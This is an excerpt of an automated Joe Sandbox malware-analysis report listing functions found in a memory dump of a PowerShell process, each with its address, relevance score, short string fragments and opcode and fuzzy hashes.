                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$4']q$$]q$$]q$$]q
                                                                    • API String ID: 0-2353078639
                                                                    • Opcode ID: 55117ddce784f706aac7645cde8619c1ff2b87b4620349f7f1b85370417fd815
                                                                    • Instruction ID: 9ae5b1d019770865e32c747d4aac48a04873e80be9ce1374f1a4e625d9073799
                                                                    • Opcode Fuzzy Hash: 55117ddce784f706aac7645cde8619c1ff2b87b4620349f7f1b85370417fd815
                                                                    • Instruction Fuzzy Hash: 07315BB2B0426ACFCB280E69945017EB7D5AFA9162B24447BC845CB165CA35C4C7E771
                                                                    Function 07828020 Relevance: 6.4, Strings: 5, Instructions: 108COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$tP]q$$]q$$]q$$]q
                                                                    • API String ID: 0-2702571027
                                                                    • Opcode ID: f24941b7aae1824bfb7fa3fe1c588a8a2c5cf5f773530d2721aa33558f4de089
                                                                    • Instruction ID: f6a403390aac0374dd8987dca1a7ff43c903baf3fc0fe5119eb01e8023d4be05
                                                                    • Opcode Fuzzy Hash: f24941b7aae1824bfb7fa3fe1c588a8a2c5cf5f773530d2721aa33558f4de089
                                                                    • Instruction Fuzzy Hash: 2D31B3B1B0022AEFDF288E05C940BA6B7E1FF65766F18C066D815DB290C775D8C2DB91
                                                                    Function 0782C976 Relevance: 6.3, Strings: 5, Instructions: 85COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$d%cq$d%cq$d%cq$tP]q
                                                                    • API String ID: 0-1723543176
                                                                    • Opcode ID: 9fe5ad8d364105dc7b45acc097d2d05d4ba8c6b293c00b6ae457377c71d5c52a
                                                                    • Instruction ID: 82b6ddda3432cf47ad531b0f5bdf5a245c571c66f2d0f1a3e74d2e93f353f4f3
                                                                    • Opcode Fuzzy Hash: 9fe5ad8d364105dc7b45acc097d2d05d4ba8c6b293c00b6ae457377c71d5c52a
                                                                    • Instruction Fuzzy Hash: AD31A4B1A402259FC764CF59C440A6EBBE2EB98715F248556E906EB350C732DC82CBA0
                                                                    Function 0782C0E0 Relevance: 5.5, Strings: 4, Instructions: 491COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (o]q$(o]q$(o]q$(o]q
                                                                    • API String ID: 0-1261621458
                                                                    • Opcode ID: bff12f22b643cf9ecbfb3043e626358e2deb81334b96c5721aec9c16311fd7cc
                                                                    • Instruction ID: 071391b5df42bb72d45f132e049c7065f4006f6ee59b02479415c3f390ecc8c2
                                                                    • Opcode Fuzzy Hash: bff12f22b643cf9ecbfb3043e626358e2deb81334b96c5721aec9c16311fd7cc
                                                                    • Instruction Fuzzy Hash: 9EF124B170432ADFCB158F68D81477EBBA2EF95312F14846AE405CB291DB35C886D7B1
                                                                    Function 0782DB48 Relevance: 5.1, Strings: 4, Instructions: 115COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: XRbq$XRbq$tP]q$$]q
                                                                    • API String ID: 0-2385373255
                                                                    • Opcode ID: 27e5e8c538f7c51d1f1498e4d1ac0069cbc3308d7c003e026da4517d0351f92e
                                                                    • Instruction ID: f461a2748f6a014335e941c0e191fee64b19f9d84dbc0b24a52f5900702ecbfa
                                                                    • Opcode Fuzzy Hash: 27e5e8c538f7c51d1f1498e4d1ac0069cbc3308d7c003e026da4517d0351f92e
                                                                    • Instruction Fuzzy Hash: C94174B0B00225EFCB248E19C144AAABBF2AB95726F15C099D804DB364C775DDC2DBB1
                                                                    Function 07823E80 Relevance: 5.1, Strings: 4, Instructions: 80COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$W$$]q$$]q
                                                                    • API String ID: 0-1502658858
                                                                    • Opcode ID: de8ce5d19a09135b0af6c61d6b8cff483c5b76f01c31a3d2e164a8aff7f4c597
                                                                    • Instruction ID: ae20e6d10532ffb0b73596f83b6d86459f86962407d06491d828036d5cc101c6
                                                                    • Opcode Fuzzy Hash: de8ce5d19a09135b0af6c61d6b8cff483c5b76f01c31a3d2e164a8aff7f4c597
                                                                    • Instruction Fuzzy Hash: 2B21F3B5A0432BEFCF258E58E4A0665BBF0AF25252F1941A7CD48C6901D33984C6EB51
                                                                    Function 078282B0 Relevance: 5.1, Strings: 4, Instructions: 67COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $]q$$]q$$]q$$]q
                                                                    • API String ID: 0-858218434
                                                                    • Opcode ID: bed68b5c3184975a9b7b7717d974b2dfaf81c7f74a86990f9dede50e162b826f
                                                                    • Instruction ID: fec30c31fa5b90534131c5d70f6e1141615d73c951494cdc773aeb7e62b82832
                                                                    • Opcode Fuzzy Hash: bed68b5c3184975a9b7b7717d974b2dfaf81c7f74a86990f9dede50e162b826f
                                                                    • Instruction Fuzzy Hash: 8111DFB2A0832ADFCF248E5AC48467AB7F0AFB1657F58806AC844C7201D731D4C2E792